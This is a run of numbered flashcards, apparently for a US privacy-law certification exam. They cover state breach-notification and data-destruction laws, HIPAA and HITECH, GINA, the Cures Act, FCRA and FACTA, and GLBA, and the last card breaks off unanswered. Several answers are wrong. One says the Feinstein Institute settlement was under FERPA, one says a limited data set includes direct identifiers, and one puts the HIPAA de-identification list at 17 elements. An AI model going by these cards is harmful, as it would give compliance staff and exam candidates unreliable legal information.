  • Share information concerning the breach to understand the extent of the breach
  • Determine what reporting is required
  • Assess the risk of harm for individuals potentially affected by the breach
  • Mitigate the risk of harm for individuals potentially affected by the breach
  • Notify the individuals potentially affected by the breach
210
Q

In the absence of a federal law, states have taken the lead in setting requirements related to data breaches, and caused what?

A

As of 2017, 48 of the 50 states, the District of Columbia, Puerto Rico and the U.S. Virgin Islands have enacted state breach notification laws

211
Q

Connecticut’s definition of personal information

A

An individual’s first name or first initial and last name in combination with any one, or more, of the following data: (1) Social Security number, (2) driver’s license number or state identification card number or (3) account number, credit or debit card number, in combination with any required security code, access code or password that would permit access to an individual’s financial account

212
Q

Almost all states exclude publicly available information, defined often to include information “lawfully made available to the general public from federal, state or local government records or widely distributed media.” There are, however, some outliers such as . . .

A

Idaho, Louisiana and Michigan, which do not include such an exception in their laws

213
Q

Connecticut describes the covered entities subject to its notification law as

A

Any person who conducts business in this state, and who, in the ordinary course of such person’s business, owns, licenses or maintains computerized data that includes personal information.

214
Q

Some states limit the definition of covered entities to those that conduct business in that state

A

Georgia law applies only to information brokers. Texas law specifically requires notification to be sent to residents of other states that do not have a similar law requiring notification

215
Q

Connecticut defines a “breach” of security as

A

Unauthorized access to or acquisition of electronic files, media, databases or computerized data containing personal information, when access to the personal information has not been secured by encryption or by any other method or technology that renders the personal information unreadable or unusable

216
Q

In California, a “breach of the security of [a] system” occurs when . . .

A

There is unauthorized acquisition of the personal information that “compromises the confidentiality, security or integrity” of the information

217
Q

The Texas law requires Texas companies that experience a data breach

A

to notify not only Texas residents but also residents of states lacking a data protection notification law

218
Q

As of 2017, only Florida, New Mexico, Ohio, Rhode Island, Tennessee, Vermont, Washington and Wisconsin specify a limit to expeditious time—typically no later than ____ after the discovery of the breach

A

45 days

219
Q

What is North Carolina required to specify in the contents of the notification to the data subject?

A
  • A description of the incident in general terms
  • A description of the type of personal information that was subject to the unauthorized access and acquisition
  • A description of the general acts of the business to protect the personal information from further unauthorized access
  • A telephone number for the business that the person may call for further information and assistance, if one exists
  • Advice that directs the person to remain vigilant by reviewing account statements and monitoring free credit reports
  • The toll-free numbers and addresses for the major consumer reporting agencies
  • The toll-free numbers, addresses and website addresses for the Federal Trade Commission (FTC) and the North Carolina attorney general’s office, along with a statement that the individual can obtain information from these sources about preventing identity theft
220
Q

How do you notify a data breach?

A

States generally provide notification options, but a written notice to the data subject is always required first. Telephonic and electronic messages are typical alternatives, but usually only if the data subject has previously explicitly chosen one of those as the preferred communication method

221
Q

There are three basic exceptions for providing data breach notification

A
  1. Exception allowed by states is for entities subject to other, more stringent data breach notification laws (e.g. HIPAA, GLBA)
  2. Most states allow exceptions for entities that already follow breach notification procedures as part of their own information security policies as long as these are compatible with the requirements of the state law
  3. In most states, a safe harbor exists for data that was encrypted, redacted, unreadable or unusable
222
Q

Encryption

A

Process of encoding information so that only the sender and intended recipients can read it. Symmetric systems use a single secret key shared by both sides; public-key (asymmetric) systems use a pair of keys: a public key, which can be distributed openly and is used to encrypt, and a private key, held only by the intended recipient, which is needed to decrypt the message. In either case the protection is only as strong as the secrecy of the decrypting key, which is why breach laws treat encrypted data differently when the key is also compromised

223
Q

Encryption requirements under Massachusetts

A

The Massachusetts Personal Information Security Regulation states that all parties that “own or license” personal information pertaining to Massachusetts residents must encrypt all personal information stored on laptops or other portable devices, as well as wireless transmissions and transmissions sent over public networks

224
Q

Encryption requirements under California

A

As with the California data breach law, the level and type of encryption required is not specified

Later in 2016, California changed its data breach notification law to require notice that a breach occurred related to: (1) both encrypted data and the encryption key or (2) encrypted data when the business has a reasonable belief that the encryption key or security credentials can be obtained by the hacker

225
Q

What state was the first to not have encryption as the exception to notification of a data breach?

A

Tennessee was the first state in the country to broadly require notification regardless of whether the information was encrypted

In 2017, Tennessee again amended its statute. The change clarified that encrypted data receives the protection of the safe harbor, unless the encryption key is also acquired in the breach

226
Q

As of 2017, at least ___ states have data destruction laws

A

32 states

227
Q

Destruction laws under Arizona

A

Arizona law applies only to paper records.

228
Q

Destruction laws under New Mexico

A

Requires “shredding, erasing or otherwise modifying the personal identifying information contained in the records to make the personal identifying information unreadable or undecipherable

229
Q

Destruction laws under California

A

California requires destruction such that records are “unreadable or undecipherable through any means” (emphasis added)

230
Q

Destruction laws under Illinois and Utah

A

Illinois and Utah apply only to government entities

231
Q

Destruction laws under Massachusetts: penalties

A

Massachusetts stipulates steep penalties of “not more than $100 per data subject affected, provided said fine shall not exceed $50,000 for each instance of improper disposal

232
Q

The FTC’s Disposal Rule contains requirements for proper disposal of consumer reports and information derived from ______

A

Consumer reports

233
Q

Reasons why relatively strict privacy laws exist for healthcare

A
  1. medical information is related to the inner workings of one’s body or mind. One’s individual sense of self may be violated if others have unfettered access to this information.
  2. most doctors believe that patients will be more open about their medical conditions if they have assurance that embarrassing medical facts will not be revealed.
  3. medical privacy protections can protect employees from the risk of unequal treatment by employers.
234
Q

Confidentiality of Substance Use Disorder Patient Records Rule (scope, applicability, disclosure, redisclosure, and security of records)

A
  • Scope: covers the disclosure and use of “patient identifying” information by treatment programs for alcohol and substance abuse
  • Applicability: the law applies to any program that receives federal funding
  • Disclosure: the program must obtain written patient consent before disclosing information subject to the Rule
  • Redisclosure: redisclosing information obtained from a program is prohibited when that information would identify, directly or indirectly, an individual as having been diagnosed, treated, or referred for treatment
  • Security of records: an entity lawfully holding patient-identifying information must have formal policies and procedures in place to protect the security
235
Q

Exceptions to consent requirements Confidentiality of Substance Use Disorder Patient Records Rule

A
  • Medical emergencies
  • Scientific research
  • Audits and evaluations
  • Communications with a qualified service organization (QSO) related to information needed by the organization to provide services to the program
  • Crimes on program premises or against program personnel
  • Child abuse reporting
  • Court order
236
Q

Violations of the Confidentiality of Patient Records for Alcohol and Other Drug Treatment Rule are criminal. Penalties include . . .

A

The first violation results in a fine of not more than $500. Each subsequent offense is fined not more than $5,000. These violations are reported to the U.S. Attorney’s Office

237
Q

Purpose of HIPAA

A

To improve efficiency, HIPAA required entities receiving federal healthcare payments such as Medicare and Medicaid to shift reimbursement requests to electronic formats

238
Q

Protected health information (PHI)

A

Defined as any individually identifiable health information that: is transmitted or maintained in any form or medium; is held by a covered entity or its business associate; identifies the individual or offers a reasonable basis for identification; is created or received by a covered entity or an employer; and relates to a past, present or future physical or mental condition, provision of health care or payment for health care to that individual

239
Q

Electronic protected health information (ePHI)

A

Any PHI that is transmitted or maintained in electronic media (such as computer hard drives, magnetic tapes or disks, or digital memory cards, all of which are considered electronic storage media). Paper records, paper-to-paper fax transmissions, and voice communications (e.g., telephone) are not considered transmissions via electronic media

240
Q

Entities that are directly covered under HIPAA (“covered entities”) include:

A
Healthcare providers (e.g., doctors’ offices, hospitals) that conduct certain transactions in electronic form
Health plans (e.g., health insurers)
Healthcare clearinghouses (e.g., third-party organizations that host, handle or process medical information)
241
Q

What entities does HIPAA not apply to?

A

It applies to these covered entities, but not to other healthcare providers and services. For instance, some doctors accept only cash or credit cards and do not bill for insurance. They are not covered by HIPAA. More broadly, individuals reveal medical information in a wide variety of settings, ranging from conversations with friends and colleagues, to purchasing books about healthcare, to surfing on healthcare websites and even posting medical information online. These sorts of healthcare information are outside the scope of HIPAA

242
Q

Before the HITECH update, business associates

A

Business associates were not subject to HIPAA but became subject to privacy and security protections under the written contracts they signed with covered entities. Under HITECH, however, HIPAA privacy and security rules are codified and apply directly to business associates

243
Q

Under the HIPAA Privacy Rule, a business associate is . . .

A

Any person or organization, other than a member of a covered entity’s workforce, that performs services and activities for, or on behalf of, a covered entity, if such services or activities involve the use or disclosure of PHI

244
Q

Before the release of HHS’ final rule, under HITECH, when a covered entity engaged another entity to provide the activities and services under HITECH, the Privacy Rule required that the covered entity

A

Enter into a business associate agreement (a contract) with that other entity. This contract would include provisions that passed the privacy and security standard down to the contracting entity

245
Q

Modifications to the Security Rule in HITECH, however, now require business associates and covered entities to implement . . .

A

reasonable, appropriate safeguards to protect PHI (in addition to signing a business associate agreement). As such, covered entities and business associates should implement security practices that, on the whole, comply with the Security Rule.

246
Q

Transactions Rule

A

In August 2000, HHS promulgated the regulations on standard electronic formats for healthcare transactions, known as the “Transactions Rule.” This was followed in December 2000 by rules to protect the privacy of personal health information, known as the “Privacy Rule”

247
Q

Compared with other U.S. privacy laws, HIPAA . . .

A

HIPAA provides perhaps the most detailed implementation of the Fair Information Privacy Practices, including requirements concerning privacy notices, authorizations for use and disclosure of PHI, limits on use and disclosure to the minimum necessary, individual access and accounting rights, security safeguards, and accountability through administrative requirements and enforcement

248
Q

HIPAA Privacy Rule: Notices

A

The Privacy Rule generally requires a covered entity to provide a detailed privacy notice at the date of first service delivery

249
Q

Exceptions to HIPAA Privacy Notice

A
  • A privacy notice does not have to be provided when (1) the healthcare provider has an “indirect treatment relationship” with the patient OR (2) in the case of medical emergencies
  • The rule is quite specific about elements that must be included in the notice, including detailed statements about individuals’ rights with respect to their PHI
250
Q

HIPAA Privacy Rule: Authorizations for uses and disclosures

A

Consistent with the statutory goal of improving efficiency in the healthcare system, HIPAA itself authorizes the use and disclosure of PHI for essential healthcare purposes: treatment, payment and operations (collectively, TPO), as well as for certain other established compliance purposes. Other uses or disclosures of PHI require the individual’s opt-in authorization

251
Q

HIPAA Privacy Rule: Safeguards

A

The Privacy Rule requires that covered entities implement administrative, physical and technical safeguards to protect the confidentiality and integrity of all PHI

252
Q

HIPAA Security Rule: Safeguards

A

The HIPAA Security Rule requires both covered entities AND business associates to implement administrative, physical and technical safeguards only for ePHI. Like the Privacy Rule, the HIPAA Security Rule aims to prevent unauthorized use or disclosure of PHI. However, the Security Rule also aims to maintain the integrity and availability of ePHI. Accordingly, the Security Rule addresses data backup and disaster recovery, among other related issues

253
Q

Who is the primary enforcer for the Privacy Rule?

A

The primary enforcer for the Privacy Rule in HHS is the Office of Civil Rights (OCR), which processes individual complaints and can assess civil monetary penalties of up to approximately 1.6 million per year per type of violation, as of the writing of this book

254
Q

Wellpoint case

A

WellPoint agreed to pay a civil penalty of $1.7 million in 2013 to settle allegations that it violated HIPAA when it did not adequately implement policies and procedures to protect the ePHI of 612,402 customers

255
Q

Feinstein Institute for Medical Research case

A

In 2016, Feinstein Institute for Medical Research agreed to pay $3.9 million to settle claims that it violated the Family Educational Rights and Privacy Act (FERPA) when the ePHI of 13,000 patients and research participants was stolen in a laptop taken from an employee’s vehicle

256
Q

What is the most severe penalty for non-compliance with HIPAA?

A
  • The U.S. Department of Justice (DOJ) has criminal enforcement authority, with prison sentences of up to 10 years.
  • For the many companies within its jurisdiction, the FTC can bring enforcement actions for unfair and deceptive practices, even for entities covered by HIPAA
  • State attorneys general can also bring enforcement for unfair and deceptive practices, or pursuant to any applicable state medical privacy law
257
Q

Limits on and Exceptions to the HIPAA Privacy Rule

A

The rule does not require authorizations for (1) the major categories of treatment, payment and healthcare operations; (2) de-identified information; and (3) medical research

258
Q

HIPAA: de-identification

A

The Privacy Rule provides two methods for de-identifying data: (1) remove all of at least 17 data elements listed in the rule, such as name, phone number and address; or (2) have an expert certify that the risk of re-identifying the individuals is very small

259
Q

HIPAA: medical research

A
  • The Privacy Rule has detailed provisions for how PHI is used for medical research purposes
  • Research can occur with the consent of the individual, or without consent if an authorized entity such as an institutional review board approves the research as consistent with the Privacy Rule and general rules covering research on human subjects.
  • Research is permitted on de-identified information, and rules are more flexible if only a limited data set is released to researchers
260
Q

HIPAA: other exceptions

A

The Privacy Rule contains other exceptions under which PHI may be used without consent.

  • information used for public health activities;
  • to report victims of abuse, neglect or domestic violence;
  • in judicial and administrative proceedings;
  • for certain law enforcement activities; and
  • for certain specialized governmental functions
261
Q

HIPAA Security Rule

A
  • Establishes minimum security requirements for PHI that a covered entity receives, creates, maintains or transmits in electronic form
  • Designed to require covered entities to implement “reasonable” security measures in a technology-neutral manner
  • Goal: all covered entities to implement “policies and procedures to prevent, detect, contain, and correct security violations.”
262
Q

HIPAA Security Rule consists of “standards” and “implementation specifications” . . .

A

The Security Rule consists of “standards” and “implementation specifications,” which encompass administrative, technical and physical safeguards. Some of the implementation specifications are required, while others are considered “addressable”

263
Q

The HIPAA Security Rule requires covered entities and business associates to:

A
  1. Ensure the confidentiality, integrity and availability of all ePHI the covered entity creates, receives, maintains or transmits
  2. Protect against any reasonably anticipated threats or hazards to the security or integrity of the ePHI
  3. Protect against any reasonably anticipated uses or disclosures of such information that are not permitted or required under the Privacy Rule
  4. Ensure compliance with the Security Rule by its workforce
264
Q

As it develops its security program under the HIPAA Security Rule, each covered entity must consider the following factors:

A
  • The size, complexity and capabilities of the covered entity
  • The covered entity’s technical infrastructure, hardware and software security capabilities
  • The costs of security measures
  • The probability and criticality of potential risks to electronic protected health information
265
Q

Does HIPAA preempt state law?

A

It is important to remember that HIPAA does not preempt state laws that provide more protection than the federal law

266
Q

HIPAA: In practice, reviewing applicable state laws will be important for ensuring compliance. Topics that should be of particular concern in this review include:

A

(1) additional patient rights,
(2) added uses or disclosures for PHI, and
(3) shortened deadlines for action

267
Q

HITECH was enacted as part of the . . .

A

HITECH was enacted as part of the American Recovery and Reinvestment Act of 2009 to promote the adoption and meaningful use of health information technology

268
Q

HITECH: notice of breach

A

In the event of unauthorized acquisition, access, use or disclosure of information, a breach is presumed to have occurred, unless the covered entity demonstrates through a risk assessment that there is a low probability that the security or privacy of the information has been compromised

269
Q

HITECH: increased penalties

A
  • HHS has issued a final rule pursuant to HITECH that allows for penalties of up to $1.5 million for the most willful violations and extends criminal liability to individuals who misuse PHI.
  • The enforcement rules provide for penalties even if the covered entity did not know of the violation
270
Q

HITECH: limited data

A

All disclosures by a covered entity should attempt to comply with the definition of a limited data set, and if this is not feasible, data disclosed must be the minimum amount necessary. The term limited data set refers to protected health information that includes direct identifiers of the individual.

271
Q

HITECH: Electronic Health Records (EHR) - who can qualify?

A

The $19 billion in funding in HITECH created important incentives for health providers to use Electronic Health Records (EHRs) more extensively. Providers who make “meaningful use” of EHRs can qualify for these funds.

272
Q

Genetic Information Nondiscrimination Act of 2008

A

Prohibits health insurance companies from discriminating on the basis of genetic predispositions in the absence of manifest symptoms or from requesting that applicants receive genetic testing, and prohibits employers from using genetic information in making employment decisions

273
Q

What rule was amended by GINA?

A

GINA amended a variety of existing pieces of legislation including, among others, the Employee Retirement Income Security Act (ERISA), the Social Security Act and the Civil Rights Act

274
Q

The amendments to ERISA prohibit group health plan providers from . . .

A

adjusting premiums or other contribution schemes on the basis of genetic information, absent a manifestation of a disease or disorder

275
Q

GINA also amended ERISA to prohibit group health plan providers from

A

requesting or requiring genetic testing in connection with the offering of group health plans, although an exception is carved out for requests for voluntary testing in connection with research

276
Q

Public Health Service Act

A

Applies to participants in the individual health insurance market to prohibit adjustments to premiums or other contribution schemes on the basis of genetic information absent the manifestation of disease or disorder.

277
Q

GINA also directs the secretary of HHS to revise HIPAA regulations such that genetic information is considered _____ and that the disclosure of such information _____

A

GINA also directs the secretary of HHS to revise HIPAA regulations such that genetic information is considered health information, and such information may not be disclosed by covered entities, pursuant to HIPAA

278
Q

Aside from health care insurance, GINA also takes aim at the possibility of employment discrimination based on . . .

A

Aside from health care insurance, GINA also takes aim at the possibility of employment discrimination based on genetic information in the absence of the manifestation of a disease or disorder

279
Q

Along with expressly prohibiting discrimination on the basis of genetic information, these portions of GINA prohibit employers from ______

A

Along with expressly prohibiting discrimination on the basis of genetic information, these portions of GINA prohibit employers from requiring, requesting or purchasing such genetic information about employees or family members unless an express exception applies

280
Q

Exceptions under GINA are provided for instances where:

A

(1) such a request is inadvertent,
(2) the request is part of an employer-offered wellness program that the employee voluntarily participates in with written authorization,
(3) the request is made to comply with the Family and Medical Leave Act of 1993,
(4) an employer purchases commercially and publicly available materials that include the information,
(5) the information is used for legally required genetic monitoring for toxin exposure in the workplace if the employee voluntarily participates with written authorization or
(6) the employer conducts DNA analysis for law enforcement purposes and requests the information for quality-control purposes (i.e., to identify contamination)

281
Q

Does GINA provide for a private right of action?

A

GINA itself does not provide for a private right of action, but—depending on the violation—private rights of action may be available under the federal laws that it revises, as well as under similar state laws

282
Q

Purpose of the 21st Century Cures Act

A

The purpose of the 21st Century Cures Act (“Cures Act”) is to expedite the research process for new medical devices and prescription drugs, quicken the process for drug approval, and reform mental health treatment

283
Q

The Cures Act has numerous privacy-related provisions, and seeks a balance between the . . .

A

The Cures Act has numerous privacy-related provisions, and seeks a balance between the protection of personal data and the public interest in the appropriate utilization of this information

284
Q

Privacy provisions in the Cures Act include:

A
  • Certain individual biomedical research information exempted from disclosure under the Freedom of Information Act
  • Researchers permitted to remotely view PHI
  • Information blocking prohibited but HIPAA’s protection of PHI remains
  • “Certificates of confidentiality” for research
  • “Compassionate” sharing of mental health or substance abuse information with family or caregivers
285
Q

Purpose of Fair Credit Reporting Act

A

The Fair Credit Reporting Act (FCRA) was enacted in 1970 to regulate the consumer reporting industry and provide privacy rights in consumer reports.

The origins of the FCRA can be traced to the rise of consumer credit in the United States. In the post-World War II era, merchants began to share more in-depth customer data in order to facilitate lending to households. By the 1960s, consumer credit was critical, but increasingly, individuals were being harmed by inaccurate information that they could neither see nor correct. In response, Congress passed the FCRA, the first federal law to regulate the use of personal information by private businesses

286
Q

The FCRA was amended by ____

A

FACTA

287
Q

The FCRA regulates any . . .

A

The FCRA regulates any “consumer reporting agency” (CRA) that furnishes a “consumer report,” which is used primarily for assisting in establishing a consumer’s eligibility for credit

288
Q

What is a CRA?

A

A CRA is any person or entity that compiles or evaluates personal information for the purpose of furnishing consumer reports to third parties for a fee

289
Q

What are some examples of a CRA?

A

Three well-known examples of CRAs are Experian, Equifax and TransUnion, which are leading providers of credit information and credit scores

290
Q

A consumer report is any communication by a CRA related to an individual that pertains to the person’s:

A
  • Creditworthiness
  • Credit standing
  • Credit capacity
  • Character
  • General reputation
  • Personal characteristics
  • Mode of living
291
Q

Users of consumer reports must meet four main requirements under the FCRA:

A
  1. Third-party data for substantive decision making must be appropriately accurate, current and complete
  2. Consumers must receive notice when third-party data is used to make adverse decisions about them
  3. Consumer reports may be used only for permissible purposes
  4. Consumers must have access to their consumer reports and an opportunity to dispute them or correct any errors
292
Q

Enforcement of the FCRA is available through

A

(1) dispute resolution, (2) private litigation, and (3) government actions.

The dispute resolution infrastructure permits the consumer to file a request with the CRA to dispute the accuracy of information, and then requires the CRA to investigate the consumer’s complaint

293
Q

Noncompliance with the FCRA

A

Noncompliance with the FCRA can lead to civil and criminal penalties. In addition to actual damages, as of the writing of this book, violators are subject to statutory damages of at least $1,000 per violation, and at least $3,756 for willful violations

294
Q

Government enforcement actions for violations of the FCRA can be brought by the

A

FTC, the CFPB, and state attorneys general

295
Q

FCRA: The state attorneys general are required to give notice to the ____ prior to filing suit and the ____ retains _______

A

The state attorneys general are required to give notice to the FTC prior to filing suit and the FTC retains the authority to intervene in the cases brought by the state attorneys general

296
Q

TeleCheck Services, Inc. case

A
  • In 2014 TeleCheck Services (large check authorization service company) and TRS Recovery Services (associated debt-collection company) agreed to pay $3.5 million to settle FTC charges for FCRA violations.
  • FTC alleged that TeleCheck, a CRA, did not comply with dispute procedures for consumers whose checks were denied based on info provided by the business
  • TRS, a company that handles consumer debt taken on by TeleCheck, was alleged to have violated requirements of the FTC’s Furnisher Rule, which requires entities furnishing info to CRAs to ensure the accuracy and integrity of the info provided.
  • The settlement was part of a broader initiative by the FTC to target the practices of data brokers that sell info to companies making decisions about consumers
297
Q

Clarity Services, Inc. case

A
  • An example of CFPB enforcement
  • The CFPB alleged that Clarity failed to properly investigate consumers who attempted to dispute info on their credit reports and obtained credit reports without a permissible purpose
  • As a result, Clarity Services agreed to pay an $8 million civil penalty
298
Q

CRAs are required to provide this notice of their obligations to users of consumer reports

A
  1. Users must have a “permissible purpose”
  2. Users must provide certifications
  3. Users must notify consumers when adverse actions are taken
299
Q

CRA notice: 1. Users must have a “permissible purpose”

A
  1. As ordered by a court or a federal grand jury subpoena
  2. As instructed by the consumer in writing
  3. For the extension of credit as a result of an application from a consumer, or the review or collection of a consumer’s account
  4. For employment purposes, including hiring and promotion decisions, where the consumer has given written permission
  5. For the underwriting of insurance as a result of an application from a consumer
  6. When there is a legitimate business need, in connection with a business transaction that is initiated by the consumer
  7. To review a consumer’s account to determine whether the consumer continues to meet the terms of the account
  8. To determine a consumer’s eligibility for a license or other benefit granted by a governmental instrumentality required by law to consider an applicant’s financial responsibility or status
  9. For use by a potential investor or servicer, or current insurer, in a valuation or assessment of the credit or prepayment risks associated with an existing credit obligation
  10. For use by state and local officials in connection with the determination of child support payments, or modifications and enforcement thereof
  11. In addition, creditors and insurers may obtain certain consumer report information for the purpose of making “prescreened” unsolicited offers of credit or insurance
300
Q

CRA notice: 2. Users must provide certifications

A

Section 604(f) of the FCRA prohibits any person from obtaining a consumer report from a CRA unless the person has certified to the CRA the permissible purpose(s) for which the report is being obtained and certifies that the report will not be used for any other purpose.

301
Q

CRA notice: 3. Users must notify consumers when adverse actions are taken

A

The term adverse action is defined very broadly to include all business, credit and employment actions affecting consumers that can be considered to have a negative impact, such as denying or canceling credit or insurance, or denying employment or promotion. No adverse action occurs in a credit transaction where the creditor makes a counteroffer that is accepted by the consumer

302
Q

The FCRA also details a number of adverse actions that can be taken as a result of obtaining or reviewing the information contained within a consumer credit report

A
  • Adverse actions based on information obtained from a CRA
  • Adverse actions based on information obtained from third parties that are not consumer reporting agencies
  • Adverse actions based on information obtained from affiliates
303
Q

The FCRA requires disclosure by all persons who use credit scores in making or arranging ___ secured by __________

A

The FCRA requires disclosure by all persons who use credit scores in making or arranging loans secured by residential real property

304
Q

The FCRA imposes certain additional obligations on organizations that intend to use consumer report information for employment purposes. The user of such information must:

A
  1. Make a clear and conspicuous written notification to the consumer before the report is obtained, in a document that consists solely of the disclosure that a consumer report may be obtained by the employer.
  2. Obtain prior written consumer authorization in order to obtain a consumer report. Authorization to access reports during the term of employment may be obtained at the time of employment.
  3. Certify to the CRA that the above steps have been followed, that the information being obtained will not be used in violation of any federal or state equal opportunity law or regulation, and that, if any adverse action is to be taken based on the consumer report, a copy of the report and a summary of the consumer’s rights will be provided to the consumer.
  4. Before taking an adverse action, provide a copy of the report to the consumer as well as the summary of the consumer’s rights. (The user should receive this summary from the CRA.) An adverse action notice should be sent after the adverse action is taken
305
Q

The FCRA provides special procedures for investigations of suspected misconduct by an employee or for compliance with federal, state or local laws and regulations or the rules of a self-regulatory organization, and compliance with written policies of the employer. These investigations are not treated as consumer reports as long as

A

(1) the employer or its agent complies with the procedures set forth in the act,
(2) no credit information is used and
(3) a summary describing the nature and scope of the inquiry is provided to the employee if an adverse action is taken based on the investigation

306
Q

Investigative consumer reports contain information about a consumer’s . . .

A

character, general reputation, personal characteristics and mode of living, which is obtained through personal interviews by an entity or person that is a CRA

307
Q

Consumers who are the subjects of such reports are given special rights under the FCRA. If a user intends to obtain an investigative consumer report, Section 606 of the FCRA requires that the user of the report disclose its use to the consumer. The disclosure is subject to the following requirements:

A
  1. The consumer must be informed that an investigative consumer report may be obtained.
  2. The disclosure must be in writing and must be mailed or otherwise delivered to the consumer some time before but not later than three days after the date on which the report was first requested.
  3. The disclosure must include a statement informing the consumer of his or her right to request additional disclosures of the nature and scope of the investigation, and the summary of consumer rights required by the FCRA. The summary of consumer rights will be provided by the CRA that conducts the investigation.
  4. The user must certify to the CRA that the required disclosures have been made and that the user will make the necessary disclosure to the consumer.
  5. Upon written request of a consumer made within a reasonable period of time after the required disclosures, the user must make a complete disclosure of the nature and scope of the investigation.
  6. The nature and scope disclosure must be made in a written statement that is mailed or otherwise delivered to the consumer no later than 5 days after the date on which the request was received from the consumer or the report was first requested, whichever is later
308
Q

Medical Information Under FCRA

A

FCRA limits the use of medical information obtained from CRAs, other than payment information that appears in a coded form and does not identify the medical provider.

309
Q

Medical Information Under FCRA: If medical information is to be used for an insurance transaction . . .

A

the consumer must provide consent to the user of the report, or the information must be coded

310
Q

Medical Information Under FCRA: If the report is to be used for employment purposes—or in connection with a credit transaction, except as provided in regulations issued by the banking and credit union regulators—

A

the consumer must provide specific written consent and the medical information must be relevant

311
Q

Medical Information Under FCRA: Any user who receives medical information shall not disclose the information to any other person, except where

A

necessary to carry out the purpose for which the information was disclosed, or as permitted by statute, regulation or order

312
Q

“Prescreened” Lists

A

Practice where FCRA permits creditors and insurers to obtain limited consumer report information for use in connection with firm unsolicited offers of credit or insurance, under certain circumstances and conditions. This typically involves obtaining from a CRA a list of consumers who meet certain preestablished criteria

313
Q

If any person intends to use prescreened lists, that person must:

A

(1) before the offer is made, establish the criteria that will be relied upon to make the offer and to grant credit or insurance and (2) maintain such criteria on file for a three-year period beginning on the date on which the offer is made to each consumer

314
Q

If any person intends to use prescreened lists, the user must include with each written solicitation a clear and conspicuous statement that:

A
  1. Info contained in a consumer’s CRA file was used in connection with the transaction.
  2. The consumer received the offer because he or she satisfied the criteria for creditworthiness or insurability used to screen for the offer.
  3. Credit or insurance may not be extended if, after the consumer responds, it is determined that the consumer does not meet the criteria used for screening or any applicable criteria bearing on creditworthiness or insurability, or the consumer does not furnish required collateral.
  4. The consumer may prohibit the use of info in his or her file in connection with future prescreened offers of credit or insurance by contacting the notification system established by the CRA that provided the report.
  5. The statement must include the address and toll-free telephone number of the appropriate notification system.
315
Q

Fair and Accurate Credit Transactions Act (FACTA) and preemption

A

Under FACTA, stricter state laws are preempted in most areas, although states retain some powers to enact laws addressing identity theft

316
Q

FACTA: consumer protections

A
  • Required truncation of credit and debit card numbers, so that receipts do not reveal the full credit or debit card number.
  • Gave consumers new rights to an explanation of their credit scores.
  • Gave individuals the right to request a free annual credit report from each of the three national consumer credit agencies—Equifax, Experian and TransUnion.
  • Along with other identity theft protections, FACTA required regulators to promulgate a Disposal Rule and a Red Flags Rule
317
Q

The Disposal Rule regarding consumer reports

A

Requires any individual or entity that uses a consumer report, or information derived from a consumer report, for a business purpose to dispose of that consumer information in a way that prevents unauthorized access and misuse of the data.

318
Q

Does it count if a consumer report is not written?

A

Consumer reports can be electronic or written

319
Q

Who does the disposal rule apply to?

A

The rule applies to both small and large organizations, including consumer reporting agencies, lenders, employers, insurers, landlords, car dealers, attorneys, debt collectors and government agencies

320
Q

What does disposal include?

A

Disposal includes any discarding, abandonment, donation, sale or transfer of information

321
Q

Disposal Rule: standard for disposal

A

The standard for disposal requires practices that are “reasonable” to protect against unauthorized access to or use of the consumer data

322
Q

Disposal Rule: Examples of acceptable, reasonable measures include developing and complying with policies to:

A
  • Burn, pulverize or shred papers containing consumer report information so that the information cannot be read or reconstructed
  • Destroy or erase electronic files or media containing consumer report information so that the information cannot be read or reconstructed
  • Conduct due diligence and hire a document destruction contractor to dispose of material specifically identified as consumer report information consistent with the rule
323
Q

Who is the disposal rule enforced by?

A

Enforcement of the Disposal Rule is by the FTC, the federal banking regulators and the CFPB

324
Q

Consequences for non-compliance with the disposal rule

A

Violators may face civil liability as well as federal and state enforcement actions.

325
Q

Who created the Red Flags rule?

A

The FTC, together with federal banking agencies, authored the Red Flags Rule

326
Q

Who does the Red Flags Rule apply to?

A

Specifically, the rule applies to financial institutions and creditors. “Financial institution” is defined as all banks, savings and loan associations and credit unions. It also includes all other entities that hold a “transaction account” belonging to a consumer

327
Q

The Red Flags Rule

A

The rule requires certain financial entities to develop and implement written identity theft detection programs that can identify and respond to the “red flags” that signal identity theft

328
Q

The Red Flag Program Clarification Act of 2010

A
  • Was passed in response to concern that the definition of creditor extended to implicate unintended entities, such as attorneys and health providers, simply because they allow customers to pay their bills after the time of service.
  • The clarification narrows the previously broad definition of creditor, as well as the circumstances under which they are covered by the rule
  • Eliminates entities that extend credit only “for expenses incidental to a service.”
329
Q

Who does the Red Flag Program Clarification Act of 2010 apply to?

A

The rule still applies to entities that, regularly and in the course of business:

  • Obtain or use consumer reports in connection with a credit transaction
  • Furnish information to consumer reporting agencies in connection with a credit transaction
  • Advance funds to or on behalf of someone, except for expenses incidental to a service provided by the creditor to that person

The new law also authorizes regulations that apply the rule to businesses whose accounts should be “subject to a reasonably foreseeable risk of identity theft.”

330
Q

What led to the Privacy Rule and a Safeguards Rule of the GLBA?

A

Title V of the Financial Services Modernization Act of 1999, aka GLBA, led to the promulgation of both a Privacy Rule and a Safeguards Rule

331
Q

Why were the GLBA privacy provisions created?

A

These privacy provisions were spurred by enforcement actions against major banks for controversial data practices. Prior to GLBA’s passage, a number of leading financial institutions were found to have shared detailed customer information, including account numbers and other highly sensitive data, with telemarketing firms. Subsequently, the firms used the account numbers to charge customers for unsolicited services

332
Q

MemberWorks case

A

The Minnesota attorney general’s office brought suit in 1999, as Congress was considering GLBA. The suit resulted in a $3 million settlement for allegations that the bank had sent detailed customer information to the telemarketing firm, including account numbers and related information that enabled the marketer to directly withdraw funds from the customer account. The allegations also stated that the marketing firm was using a “negative option,” where customers were charged automatically for services unless they later sent a specific request not to be billed.
The U.S. Bancorp/MemberWorks case focused popular and regulatory attention on the prevalence of data-sharing relationships between banks and third-party marketers

333
Q

Consequences of the MemberWorks Case

A

A group of 25 attorneys general brought additional actions against major financial institutions in an attempt to address these practices. Congress responded to these events by including significant privacy and security protections for consumers in GLBA and mandating further rulemaking on privacy and security by the FTC, federal banking regulators and state insurance regulators. Financial institutions were required to substantially comply with GLBA’s requirements in 2001

334
Q

Gramm-Leach-Bliley Act (GLBA)

A
  • Eliminated legal barriers to affiliations among banks, securities firms, insurance companies and other financial services companies
  • Financial institutions are required to:
    (1) Store personal financial information in a secure manner
    (2) Provide notice of their policies regarding the sharing of personal financial information
    (3) Provide consumers with the choice to opt-out of sharing some personal financial information
  • Requires financial institutions to protect consumers’ nonpublic personal information under privacy rules that were promulgated originally by the FTC and FI regulators
335
Q

Who does the GLBA apply to?

A

